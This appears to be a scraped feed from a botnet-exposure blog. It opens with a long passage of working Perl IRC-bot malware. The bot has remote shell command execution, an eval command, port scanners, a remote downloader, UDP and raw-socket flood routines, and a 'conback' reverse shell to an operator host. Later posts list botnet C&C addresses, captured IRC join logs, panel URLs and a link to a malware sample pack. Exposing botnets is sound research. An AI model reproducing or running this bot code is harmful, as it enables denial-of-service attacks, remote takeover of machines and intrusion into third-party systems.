($args =~ /^\001VERSION\001$/) {<br /> notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");<br /> }<br /> elsif ($args =~ /^\001PING\s+(\d+)\001$/) {<br /> notice("$pn", "\001PONG\001");<br /> }<br /> elsif (grep {$_ =~ /^\Q$pn\E$/i } @adms) {<br /> if ($onde eq "$meunick"){<br /> shell("$pn", "$args");<br /> }<br /> elsif ($args =~ /^(\Q$meunick\E|\Q$prefixo\E)\s+(.*)/ ) {<br /> my $natrix = $1;<br /> my $arg = $2;<br /> if ($arg =~ /^\!(.*)/) {<br /> ircase("$pn","$onde","$1") unless ($natrix eq "$prefixo" and $arg =~ /^\!nick/);<br /> } elsif ($arg =~ /^\@(.*)/) {<br /> $ondep = $onde;<br /> $ondep = $pn if $onde eq $meunick;<br /> bfunc("$ondep","$1");<br /> } else {<br /> shell("$onde", "$arg");<br /> }<br /> }<br /> }<br /> } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {<br /> if (lc($1) eq lc($meunick)) {<br /> $meunick=$4;<br /> $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;<br /> }<br /> } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {<br /> $meunick = getnick();<br /> nick("$meunick");<br /> } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {<br /> $meunick = $2;<br /> $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;<br /> $irc_servers{$IRC_cur_socket}{'nome'} = "$1";<br /> foreach my $canal (@canais) {<br /> sendraw("JOIN $canal die");<br /> }<br /> }<br />}<br /><br />sub bfunc {<br /> my $printl = $_[0];<br /> my $funcarg = $_[1];<br /> if (my $pid = fork) {<br /> waitpid($pid, 0);<br /> } else {<br /> if (fork) {<br /> exit;<br /> } else {<br /> if ($funcarg =~ /^portscan (.*)/) {<br /> my $hostip="$1";<br /> my @portas=("21","22","23","25","53","80","110","143");<br /> my (@aberta, %porta_banner);<br /> foreach my $porta (@portas) {<br /> my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);<br /> if ($scansock) {<br /> push (@aberta, $porta);<br /> $scansock->close;<br /> }<br /> }<br /> if (@aberta) {<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @aberta");<br /> } else {<br /> sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");<br /> }<br /> }<br /><br /> elsif ($funcarg =~ /^download\s+(.*)\s+(.*)/) {<br /> getstore("$1", "$2");<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :Download de $2 ($1) Conclu?do!") if ($estatisticas);<br /> }<br /><br /> elsif ($funcarg =~ /^fullportscan\s+(.*)\s+(\d+)\s+(\d+)/) {<br /> my $hostname="$1";<br /> my $portainicial = "$2";<br /> my $portafinal = "$3";<br /> my (@abertas, %porta_banner);<br /> foreach my $porta ($portainicial..$portafinal)<br /> {<br /> my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => 4);<br /> if ($scansock) {<br /> push (@abertas, $porta);<br /> $scansock->close;<br /> if ($estatisticas) {<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :Porta $porta aberta em $hostname");<br /> }<br /> }<br /> }<br /> if (@abertas) {<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @abertas");<br /> } else {<br /> sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");<br /> }<br /> }<br /><br /> # Duas Vers?es simplificada do meu Tr0x ;D<br /> elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {<br /> return unless $pacotes;<br /> socket(Tr0x, PF_INET, SOCK_DGRAM, 17);<br /> my $alvo=inet_aton("$1");<br /> my $porta = "$2";<br /> my $tempo = "$3";<br /> my $pacote;<br /> my $pacotese;<br /> my $fim = time + $tempo;<br /> my $pacota = 1;<br /> while (($pacota == "1") && ($pacotes == "1")) {<br /> $pacota = 0 if ((time >= $fim) && ($tempo != "0"));<br /> $pacote=$rand x $rand x $rand;<br /> $porta = int(rand 65000) +1 if ($porta == "0");<br /> send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");<br /> }<br /> if ($estatisticas)<br /> {<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $1");<br /> }<br /> }<br /><br /> elsif ($funcarg =~ /^udpfaixa\s+(.*)\s+(\d+)\s+(\d+)/) {<br /> return unless $pacotes;<br /> socket(Tr0x, PF_INET, SOCK_DGRAM, 17);<br /> my $faixaip="$1";<br /> my $porta = "$2";<br /> my $tempo = "$3";<br /> my $pacote;<br /> my $pacotes;<br /> my $fim = time + $tempo;<br /> my $pacota = 1;<br /> my $alvo;<br /> while ($pacota == "1") {<br /> $pacota = 0 if ((time >= $fim) && ($tempo != "0"));<br /> for (my $faixa = 1; $faixa <= 255; $faixa++) {<br /> $alvo = inet_aton("$faixaip.$faixa");<br /> $pacote=$rand x $rand x $rand;<br /> $porta = int(rand 65000) +1 if ($porta == "0");<br /> send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");<br /> if ($faixa >= 255) {<br /> $faixa = 1;<br /> }<br /> }<br /> }<br /> if ($estatisticas)<br /> {<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $alvo");<br /> }<br /> }<br /><br /> # Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p<br /> elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) {<br /> my $host = "$1";<br /> my $porta = "$2";<br /> my $proto = getprotobyname('tcp');<br /> my $iaddr = inet_aton($host);<br /> my $paddr = sockaddr_in($porta, $iaddr);<br /> my $shell = "/bin/sh -i";<br /> if ($^O eq "MSWin32") {<br /> $shell = "cmd.exe";<br /> }<br /> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";<br /> connect(SOCKET, $paddr) or die "connect: $!";<br /> open(STDIN, ">&SOCKET");<br /> open(STDOUT, ">&SOCKET");<br /> open(STDERR, ">&SOCKET");<br /> system("$shell");<br /> close(STDIN);<br /> close(STDOUT);<br /> close(STDERR);<br /><br /> if ($estatisticas)<br /> {<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Conectando-se em\002: $host:$porta");<br /> }<br /> }<br /><br /> elsif ($funcarg =~ /^oldpack\s+(.*)\s+(\d+)\s+(\d+)/) {<br /> return unless $pacotes;<br /> my ($dtime, %pacotes) = attacker("$1", "$2", "$3");<br /> $dtime = 1 if $dtime == 0;<br /> my %bytes;<br /> $bytes{igmp} = $2 * $pacotes{igmp};<br /> $bytes{icmp} = $2 * $pacotes{icmp};<br /> $bytes{o} = $2 * $pacotes{o};<br /> $bytes{udp} = $2 * $pacotes{udp};<br /> $bytes{tcp} = $2 * $pacotes{tcp};<br /> unless ($estatisticas)<br /> {<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status GERAL -\002");<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} + $pacotes{o}));<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :\002M?dia de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + <br />$bytes{o})/1024)/$dtime)." kbps");<br /> }<br /> }<br /> exit;<br /> }<br /> }<br />}<br /><br />sub ircase {<br /> my ($kem, $printl, $case) = @_;<br /><br /> if ($case =~ /^join (.*)/) {<br /> j("$1");<br /> }<br /> elsif ($case =~ /^part (.*)/) {<br /> p("$1");<br /> }<br /> elsif ($case =~ /^rejoin\s+(.*)/) {<br /> my $chan = $1;<br /> if ($chan =~ /^(\d+) (.*)/) {<br /> for (my $ca = 1; $ca <= $1; $ca++ ) {<br /> p("$2");<br /> j("$2");<br /> }<br /> } else {<br /> p("$chan");<br /> j("$chan");<br /> }<br /> }<br /> elsif ($case =~ /^op/) {<br /> op("$printl", "$kem") if $case eq "op";<br /> my $oarg = substr($case, 3);<br /> op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);<br /> }<br /> elsif ($case =~ /^deop/) {<br /> deop("$printl", "$kem") if $case eq "deop";<br /> my $oarg = substr($case, 5);<br /> deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);<br /> }<br /> elsif ($case =~ /^voice/) {<br /> voice("$printl", "$kem") if $case eq "voice";<br /> $oarg = substr($case, 6);<br /> voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);<br /> }<br /> elsif ($case =~ /^devoice/) {<br /> devoice("$printl", "$kem") if $case eq "devoice";<br /> $oarg = substr($case, 8);<br /> devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);<br /> }<br /> elsif ($case =~ /^msg\s+(\S+) (.*)/) {<br /> msg("$1", "$2");<br /> }<br /> elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {<br /> for (my $cf = 1; $cf <= $1; $cf++) {<br /> msg("$2", "$3");<br /> }<br /> }<br /> elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {<br /> for (my $cf = 1; $cf <= $1; $cf++) {<br /> ctcp("$2", "$3");<br /> }<br /> }<br /> elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {<br /> ctcp("$1", "$2");<br /> }<br /> elsif ($case =~ /^invite\s+(\S+) (.*)/) {<br /> invite("$1", "$2");<br /> }<br /> elsif ($case =~ /^nick (.*)/) {<br /> nick("$1");<br /> }<br /> elsif ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {<br /> conectar("$2", "$1", 6667);<br /> }<br /> elsif ($case =~ /^send\s+(\S+)\s+(\S+)/) {<br /> DCC::SEND("$1", "$2");<br /> }<br /> elsif ($case =~ /^raw (.*)/) {<br /> sendraw("$1");<br /> }<br /> elsif ($case =~ /^eval (.*)/) {<br /> eval "$1";<br /> }<br /> elsif ($case =~ /^entra\s+(\S+)\s+(\d+)/) {<br /> sleep int(rand($2));<br /> j("$1");<br /> }<br /> elsif ($case =~ /^sai\s+(\S+)\s+(\d+)/) {<br /> sleep int(rand($2));<br /> p("$1");<br /> }<br /> elsif ($case =~ /^sair/) {<br /> quit();<br /> }<br /> elsif ($case =~ /^novonick/) {<br /> my $novonick = getnick();<br /> nick("$novonick");<br /> }<br /> elsif ($case =~ /^estatisticas (.*)/) {<br /> if ($1 eq "on") {<br /> $estatisticas = 1;<br /> msg("$printl", "Estat?sticas ativadas!");<br /> } elsif ($1 eq "off") {<br /> $estatisticas = 0;<br /> msg("$printl", "Estat?sticas desativadas!");<br /> }<br /> }<br /> elsif ($case =~ /^pacotes (.*)/) {<br /> if ($1 eq "on") {<br /> $pacotes = 1;<br /> msg("$printl", "Pacotes ativados!") if ($estatisticas == "1");<br /> } elsif ($1 eq "off") {<br /> $pacotes = 0;<br /> msg("$printl", "Pacotes desativados!") if ($estatisticas == "1");<br /> }<br /> }<br />}<br />sub shell {<br /> return unless $acessoshell;<br /> my $printl=$_[0];<br /> my $comando=$_[1];<br /> if ($comando =~ /cd (.*)/) {<br /> chdir("$1") || msg("$printl", "Diret?rio inexistente!");<br /> return;<br /> }<br /> elsif ($pid = fork) {<br /> waitpid($pid, 0);<br /> } else {<br /> if (fork) {<br /> exit;<br /> } else {<br /> my @resp=`$comando 2>&1 3>&1`;<br /> my $c=0;<br /> foreach my $linha (@resp) {<br /> $c++;<br /> chop $linha;<br /> sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");<br /> if ($c >= "$linas_max") {<br /> $c=0;<br /> sleep $sleep;<br /> }<br /> }<br /> exit;<br /> }<br /> }<br />}<br /><br />#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki<br />sub attacker {<br /> my $iaddr = inet_aton($_[0]);<br /> my $msg = 'B' x $_[1];<br /> my $ftime = $_[2];<br /> my $cp = 0;<br /> my (%pacotes);<br /> $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;<br /><br /> socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;<br /> socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;<br /> socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;<br /> socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;<br /> return(undef) if $cp == 4;<br /> my $itime = time;<br /> my ($cur_time);<br /> while ( 1 ) {<br /> for (my $porta = 1; $porta <= 65535; $porta++) {<br /> $cur_time = time - $itime;<br /> last if $cur_time >= $ftime;<br /> send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1);<br /> send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1);<br /> send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1);<br /> send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1);<br /><br /> # DoS ?? :P<br /> for (my $pc = 3; $pc <= 255;$pc++) {<br /> next if $pc == 6;<br /> $cur_time = time - $itime;<br /> last if $cur_time >= $ftime;<br /> socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;<br /> send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1);<br /> }<br /> }<br /> last if $cur_time >= $ftime;<br /> }<br /> return($cur_time, %pacotes);<br />}<br /><br />#############<br /># ALIASES #<br />#############<br /><br />sub action {<br /> return unless $#_ == 1;<br /> sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");<br />}<br /><br />sub ctcp {<br /> return unless $#_ == 1;<br /> sendraw("PRIVMSG $_[0] :\001$_[1]\001");<br />}<br />sub msg {<br /> return unless $#_ == 1;<br /> sendraw("PRIVMSG $_[0] :$_[1]");<br />}<br /><br />sub notice {<br /> return unless $#_ == 1;<br /> sendraw("NOTICE $_[0] :$_[1]");<br />}<br /><br />sub op {<br /> return unless $#_ == 1;<br /> sendraw("MODE $_[0] +o $_[1]");<br />}<br />sub deop {<br /> return unless $#_ == 1;<br /> sendraw("MODE $_[0] -o $_[1]");<br />}<br />sub hop {<br /> return unless $#_ == 1;<br /> sendraw("MODE $_[0] +h $_[1]");<br />}<br />sub dehop {<br /> return unless $#_ == 1;<br /> sendraw("MODE $_[0] +h $_[1]");<br />}<br />sub voice {<br /> return unless $#_ == 1;<br /> sendraw("MODE $_[0] +v $_[1]");<br />}<br />sub devoice {<br /> return unless $#_ == 1;<br /> sendraw("MODE $_[0] -v $_[1]");<br />}<br />sub ban {<br /> return unless $#_ == 1;<br /> sendraw("MODE $_[0] +b $_[1]");<br />}<br />sub unban {<br /> return unless $#_ == 1;<br /> sendraw("MODE $_[0] -b $_[1]");<br />}<br />sub kick {<br /> return unless $#_ == 1;<br /> sendraw("KICK $_[0] $_[1] :$_[2]");<br />}<br /><br />sub modo {<br /> return unless $#_ == 0;<br /> sendraw("MODE $_[0] $_[1]");<br />}<br />sub mode { modo(@_); }<br /><br />sub j { &join(@_); }<br />sub join {<br /> return unless $#_ == 0;<br /> sendraw("JOIN $_[0]");<br />}<br />sub p { part(@_); }<br />sub part {sendraw("PART $_[0]");}<br /><br />sub nick {<br /> return unless $#_ == 0;<br /> sendraw("NICK $_[0]");<br />}<br /><br />sub invite {<br /> return unless $#_ == 1;<br /> sendraw("INVITE $_[1] $_[0]");<br />}<br />sub topico {<br /> return unless $#_ == 1;<br /> sendraw("TOPIC $_[0] $_[1]");<br />}<br />sub topic { topico(@_); }<br /><br />sub whois {<br /> return unless $#_ == 0;<br /> sendraw("WHOIS $_[0]");<br />}<br />sub who {<br /> return unless $#_ == 0;<br /> sendraw("WHO $_[0]");<br />}<br />sub names {<br /> return unless $#_ == 0;<br /> sendraw("NAMES $_[0]");<br />}<br />sub away {<br /> sendraw("AWAY $_[0]");<br />}<br />sub back { away(); }<br />sub quit {<br /> sendraw("QUIT :$_[0]");<br /> exit;<br />}<br /><br /># DCC<br />package DCC;<br /><br />sub connections {<br /> my @ready = $dcc_sel->can_read(1);<br /># return unless (@ready);<br /> foreach my $fh (@ready) {<br /> my $dcctipo = $DCC{$fh}{tipo};<br /> my $arquivo = $DCC{$fh}{arquivo};<br /> my $bytes = $DCC{$fh}{bytes};<br /> my $cur_byte = $DCC{$fh}{curbyte};<br /> my $nick = $DCC{$fh}{nick};<br /><br /> my $msg;<br /> my $nread = sysread($fh, $msg, 10240);<br /><br /> if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {<br /> $DCC{$fh}{status} = "Cancelado";<br /> $DCC{$fh}{ftime} = time;<br /> $dcc_sel->remove($fh);<br /> $fh->close;<br /> next;<br /> }<br /><br /> if ($dcctipo eq "get") {<br /> $DCC{$fh}{curbyte} += length($msg);<br /><br /> my $cur_byte = $DCC{$fh}{curbyte};<br /><br /> open(FILE, ">> $arquivo");<br /> print FILE "$msg" if ($cur_byte <= $bytes);<br /> close(FILE);<br /><br /> my $packbyte = pack("N", $cur_byte);<br /> print $fh "$packbyte";<br /><br /> if ($bytes == $cur_byte) {<br /> $dcc_sel->remove($fh);<br /> $fh->close;<br /> $DCC{$fh}{status} = "Recebido";<br /> $DCC{$fh}{ftime} = time;<br /> next;<br /> }<br /> } elsif ($dcctipo eq "send") {<br /> my $send = $fh->accept;<br /> $send->autoflush(1);<br /> $dcc_sel->add($send);<br /> $dcc_sel->remove($fh);<br /> $DCC{$send}{tipo} = 'sendcon';<br /> $DCC{$send}{itime} = time;<br /> $DCC{$send}{nick} = $nick;<br /> $DCC{$send}{bytes} = $bytes;<br /> $DCC{$send}{curbyte} = 0;<br /> $DCC{$send}{arquivo} = $arquivo;<br /> $DCC{$send}{ip} = $send->peerhost;<br /> $DCC{$send}{porta} = $send->peerport;<br /> $DCC{$send}{status} = "Enviando";<br /><br /> #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon<br /> open(FILE, "< $arquivo");<br /> my $fbytes;<br /> read(FILE, $fbytes, 1024);<br /> print $send "$fbytes";<br /> close FILE;<br /># delete($DCC{$fh});<br /> } elsif ($dcctipo eq 'sendcon') {<br /> my $bytes_sended = unpack("N", $msg);<br /> $DCC{$fh}{curbyte} = $bytes_sended;<br /> if ($bytes_sended == $bytes) {<br /> $fh->close;<br /> $dcc_sel->remove($fh);<br /> $DCC{$fh}{status} = "Enviado";<br /> $DCC{$fh}{ftime} = time;<br /> next;<br /> }<br /> open(SENDFILE, "< $arquivo");<br /> seek(SENDFILE, $bytes_sended, 0);<br /> my $send_bytes;<br /> read(SENDFILE, $send_bytes, 1024);<br /> print $fh "$send_bytes";<br /> close(SENDFILE);<br /> }<br /> }<br />}<br /><br /><br />sub SEND {<br /> my ($nick, $arquivo) = @_;<br /> unless (-r "$arquivo") {<br /> return(0);<br /> }<br /><br /> my $dccark = $arquivo;<br /> $dccark =~ s/[.*\/](\S+)/$1/;<br /><br /> my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};<br /> my $longip = unpack("N",inet_aton($meuip));<br /><br /> my @filestat = stat($arquivo);<br /> my $size_total=$filestat[7];<br /> if ($size_total == 0) {<br /> return(0);<br /> }<br /><br /> my ($porta, $sendsock);<br /> do {<br /> $porta = int rand(64511);<br /> $porta += 1024;<br /> $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);<br /> } until $sendsock;<br /><br /> $DCC{$sendsock}{tipo} = 'send';<br /> $DCC{$sendsock}{nick} = $nick;<br /> $DCC{$sendsock}{bytes} = $size_total;<br /> $DCC{$sendsock}{arquivo} = $arquivo;<br /><br /><br /> &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");<br /><br />}<br /><br />sub GET {<br /> my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;<br /> return(0) if (-e "$arquivo");<br /> if (open(FILE, "> $arquivo")) {<br /> close FILE;<br /> } else {<br /> return(0);<br /> }<br /><br /> my $dccip=fixaddr($dcclongip);<br /> return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);<br /> my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);<br /> $dccsock->autoflush(1);<br /> $dcc_sel->add($dccsock);<br /> $DCC{$dccsock}{tipo} = 'get';<br /> $DCC{$dccsock}{itime} = time;<br /> $DCC{$dccsock}{nick} = $nick;<br /> $DCC{$dccsock}{bytes} = $bytes;<br /> $DCC{$dccsock}{curbyte} = 0;<br /> $DCC{$dccsock}{arquivo} = $arquivo;<br /> $DCC{$dccsock}{ip} = $dccip;<br /> $DCC{$dccsock}{porta} = $dccporta;<br /> $DCC{$dccsock}{status} = "Recebendo";<br />}<br /><br /># po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz<br /><br /></code></pre><br />Now talking in #<br />Topic On: [ # ] [ !all !pacotes on ]<br />Topic By: [ kuba ]<br /><br />hosting infos:<br />http://77.88.148.25/~kriters/al<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8145212110713785976?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-54101803562205425172012-01-01T00:24:00.001+01:002012-01-01T00:29:01.141+01:00Happy new year 2012 to everyone(gezuar vitin e ri te gjithe atyre qe shkruajne e flasin shqip)Hello everyone<br />i wish u all the best and happy new year 2012<br /><br />Gezuar vitin e ri 2012 te gjithe atyre qe kane lindur shqiptare e qe shkruajne e flasin gjuhen me te bukur ne bote SHQIPEN<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5410180356220542517?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-80781478216953790342011-12-31T18:19:00.000+01:002011-12-31T18:19:00.414+01:00uniquefraud.org(underground criminal lamers hosted in 2x4.ru)today i found this email in my spams<br />de admin@uniquefraud.org via sec5127.2x4.ru <br />à my email<br />date 30 décembre 2011 22:52<br />objet News UniqueFraud<br />envoyé par sec5127.2x4.ru<br /><br />masquer les détails 22:52 (Il y a 19 heures)<br /><br /><br />Letze Chance 2011<br /><br />Wer möchte Sie nutzen?<br /><br />Komme vorbei und mach dir einen Account<br /><br />Wir freuen uns<br /><br />Die Registrierung ist nur noch ein paar Tage auf<br /><br />http://uniquefraud.org<br /><br /><br /><br />Sorry für den Spam<br /><br />UF-Team<br /><br />funny thing is theyre using cloudflare to mask their servers...<br />now what i can think cloudflare is into fraud or cloudflare staf dont give a shit about who they host ? lol<br /><br />Resolved : [uniquefraud.org] To [173.245.61.111]<br />Resolved : [uniquefraud.org] To [173.245.61.39]<br />http://whois.domaintools.com/173.245.61.111<br /><br />back to frauders <br />looks like theyre deutch and very bad lamers<br />they have a board and blog allready<br /><br />here some pictures:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-BOoQU0IZwqA/Tv9DQkyymCI/AAAAAAAAAKU/WD3jm0ydph4/s1600/uniquefraud.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="199" src="http://4.bp.blogspot.com/-BOoQU0IZwqA/Tv9DQkyymCI/AAAAAAAAAKU/WD3jm0ydph4/s320/uniquefraud.png" width="320" /></a></div><br /><br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ISRjXOoEr70/Tv9D-bNRJYI/AAAAAAAAAKg/fKA3020VaEI/s1600/uniquefrauders.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="197" src="http://2.bp.blogspot.com/-ISRjXOoEr70/Tv9D-bNRJYI/AAAAAAAAAKg/fKA3020VaEI/s320/uniquefrauders.png" width="320" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8078147821695379034?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-29257370338063642322011-12-28T19:24:00.000+01:002011-12-28T19:24:13.297+01:0064mb malware samplesThis is another package with malware samples collected during my free time<br />Inside u have alot of banking trojan samples,ngrBot samples,mirc bots samples etc<br />have fun exploring <br /><br /><a href="http://5fd0f208.theseblogs.com">Download</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2925737033806364232?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-85309772662610594842011-12-25T19:05:00.000+01:002011-12-25T19:05:11.432+01:00208.67.252.2(irc botnet hosted in United States Denver Rocketeermedia.com)Remote Host Port Number<br />208.67.252.2 2345<br /><br />NICK New[USA|00|P|29713]<br />PRIVMSG #!loco! :[M]: Thread Disabled.<br />PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.<br />USER XP-2551 * 0 :COMPUTERNAME<br />MODE New[USA|00|P|29713] -ix<br />JOIN #!loco!<br />PONG 22 MOTD<br /><br />hosting infos:<br />http://whois.domaintools.com/208.67.252.2<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8530977266261059484?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-49839912764441191312011-12-21T23:10:00.000+01:002011-12-21T23:10:15.154+01:00irc.amet12.cjb.net(irc botnet hosted in Peru Lima Telefonica Del Peru S.a.a)Resolved : [irc.amet12.cjb.net] To [200.48.201.149]<br /><br />200.48.201.149 4244 PASS \google_cache2.tmp<br /><br />NICK new[iRooT-XP-USA]861309<br />USER 8613 "" "TsGh" :8613<br />JOIN #!N!# WTF<br />PRIVMSG #!N!# :http://kajmak1.bloger.hr Has Been Visited!<br /><br />exe file:<br /><a href="http://279faa84.theseforums.com">Download</a><br /><br />hosting infos:<br />http://whois.domaintools.com/200.48.201.149<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4983991276444119131?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-87276527486503380102011-12-21T19:18:00.000+01:002011-12-21T19:18:16.293+01:00mw8.no-ip.info(irc botnet hosted in Netherlands Worldstream)Resolved : [mw8.no-ip.info] To [217.23.4.65]<br /><br />Remote Host Port Number<br />217.23.4.65 6667 PASS \google_cache2.tmp<br /><br />NICK new[iRooT-XP-USA]392156<br />USER 4337 "" "TsGh" :4337<br />JOIN #Bawse<br />PONG :irc.priv8net.com<br /><br />hosting infos:<br />http://whois.domaintools.com/217.23.4.65<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8727652748650338010?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-9668814553498990162011-12-21T01:24:00.000+01:002011-12-21T01:24:00.234+01:00blackicejoker.no-ip.biz(VertexNet hosted in Seychelles Ideal Solution Ltd)blackicejoker.no-ip.biz 193.107.17.47<br /><br />Download URLs<br /> http://193.107.17.47/VertexNet/tasks.php?uid={46774bc0-fe5b-11d5-9480-806d6172696f-1394498804} (blackicejoker.no-ip.biz) <br /> http://193.107.17.47/VertexNet/adduser.php?uid={46774bc0-fe5b-11d5-9480-806d6172696f-1394498804}&lan=10.1.8.2&cmpname=DELL-D3E62F7E26%20[Administrator]&country=Deutsch%20(Deutschland)%20+49&cc=DE&idle=9376&ver=v1.2 (blackicejoker.no-ip.biz)<br /><br />hosting infos:<br />http://whois.domaintools.com/193.107.17.47<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-966881455349899016?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-34514178983946471952011-12-20T18:44:00.000+01:002011-12-20T18:44:14.111+01:00193.107.16.114(ngrBot hosted in Seychelles Ideal Solution Ltd)Remote Host Port Number<br />193.107.16.114 1863 PASS ngrBot<br />199.15.234.7 80<br />65.110.60.20 80<br /><br />NICK n{US|XPa}tuoheyk<br />USER tuoheyk 0 0 :tuoheyk<br />JOIN 